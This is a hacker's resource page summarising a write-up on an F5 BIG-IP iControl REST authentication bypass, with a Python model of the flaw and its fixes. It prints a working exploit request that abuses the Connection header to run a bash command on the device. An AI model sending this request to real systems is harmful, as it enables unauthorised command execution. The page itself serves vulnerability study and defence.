Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

F5 iControl REST Endpoint Authentication Bypass Technical Deep Dive- 847

James Horseman - horizon3.ai, posted 3 years ago
  • F5 recently patched a critical vulnerability in their BIG-IP series. The blog post is a technical dive that starts from a payload to identify the vulnerability. This is shown below:
    POST /mgmt/tm/util/bash HTTP/1.1
    Host: 127.0.0.1
    Authorization: Basic YWRtaW46aG9yaXpvbjM=
    X-F5-Auth-Token: asdf
    User-Agent: curl/7.82.0
    Connection: X-F5-Auth-Token
    Accept: */*
    Content-Length: 39

    {"command":"run","utilCmdArgs":"-c id"}
    
  • The service is a Java application running on localhost, exposed through Apache. The vulnerability exists because the reverse proxy (the relevant code is in mod_auth_pam.so) and the service behind it have different understandings of who is responsible for authentication.
  • The module mod_auth_pam.so performs the authentication check itself in most cases, using the Authorization header. However, if an X-F5-Auth-Token header was present, it was the job of the downstream service to verify that token. If a request reached the downstream service without an X-F5-Auth-Token header, the service assumed that authentication had already passed.
  • This is a fail-open at the downstream service. Is it possible to drop the X-F5-Auth-Token header after the initial verification but before the request reaches the downstream service?
  • Yes: naming X-F5-Auth-Token in the Connection header marks it as a hop-by-hop header, so the proxy strips it. That stripping happened AFTER the verification step described above, but before the request was handed to the downstream service. Wow!
  • Overall, an amazing vulnerability that led to a lot of pain and suffering for people. Any time something fails open, there is likely a gap in there that can be exploited. Don't do it kids!
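As an added illustration (my own toy model, not code from the original post or from F5), the trust boundary described in the notes above in Python: a proxy that defers token checks to the service and strips hop-by-hop headers after its auth decision, a fail-open service beside a fail-closed one, and a hardened proxy that normalises headers before deciding. All credentials, tokens and the x-auth-verified marker header are constructed for the example.

```python
import base64

# Constructed sample credentials and token; not real values.
VALID_BASIC = "Basic " + base64.b64encode(b"admin:correct-password").decode()
VALID_TOKEN = "example-valid-token"
TOKEN_HDR = "x-f5-auth-token"
VERIFIED_HDR = "x-auth-verified"  # hypothetical marker only the proxy may set


def strip_hop_by_hop(headers: dict) -> dict:
    """RFC 7230 behaviour: drop every header the client listed in Connection."""
    listed = {h.strip().lower() for h in headers.get("connection", "").split(",") if h.strip()}
    return {k: v for k, v in headers.items() if k not in listed and k != "connection"}


def proxy(headers: dict, service, hardened: bool) -> int:
    """Model of the front-end auth module. Returns an HTTP status code."""
    headers = {k.lower(): v for k, v in headers.items()}
    if hardened:
        headers.pop(VERIFIED_HDR, None)          # never trust a client-supplied marker
        headers = strip_hop_by_hop(headers)      # normalise BEFORE the auth decision
    if TOKEN_HDR not in headers:                 # token present: verification deferred to the service
        if headers.get("authorization") != VALID_BASIC:
            return 401
        headers[VERIFIED_HDR] = "1"              # positive evidence that the proxy checked
    if not hardened:
        headers = strip_hop_by_hop(headers)      # the bug: stripping happens AFTER the decision
    return service(headers)


def service_fail_open(headers: dict) -> int:
    """Vulnerable model: no token means 'the proxy must already have checked'."""
    if TOKEN_HDR in headers:
        return 200 if headers[TOKEN_HDR] == VALID_TOKEN else 401
    return 200


def service_fail_closed(headers: dict) -> int:
    """Hardened model: demand positive evidence of authentication, else deny."""
    if headers.get(TOKEN_HDR) == VALID_TOKEN:
        return 200
    return 200 if headers.get(VERIFIED_HDR) == "1" else 401


# Constructed request shaped like the one above: bogus Basic credentials, a junk
# token, and a Connection header naming the token header so the proxy strips it.
BYPASS = {"Authorization": "Basic YWRtaW46aG9yaXpvbjM=", "X-F5-Auth-Token": "asdf",
          "Connection": "X-F5-Auth-Token"}
```

Either fix alone (fail-closed service, or proxy that normalises before deciding) turns the bypass into a 401; applying both is the defence-in-depth answer.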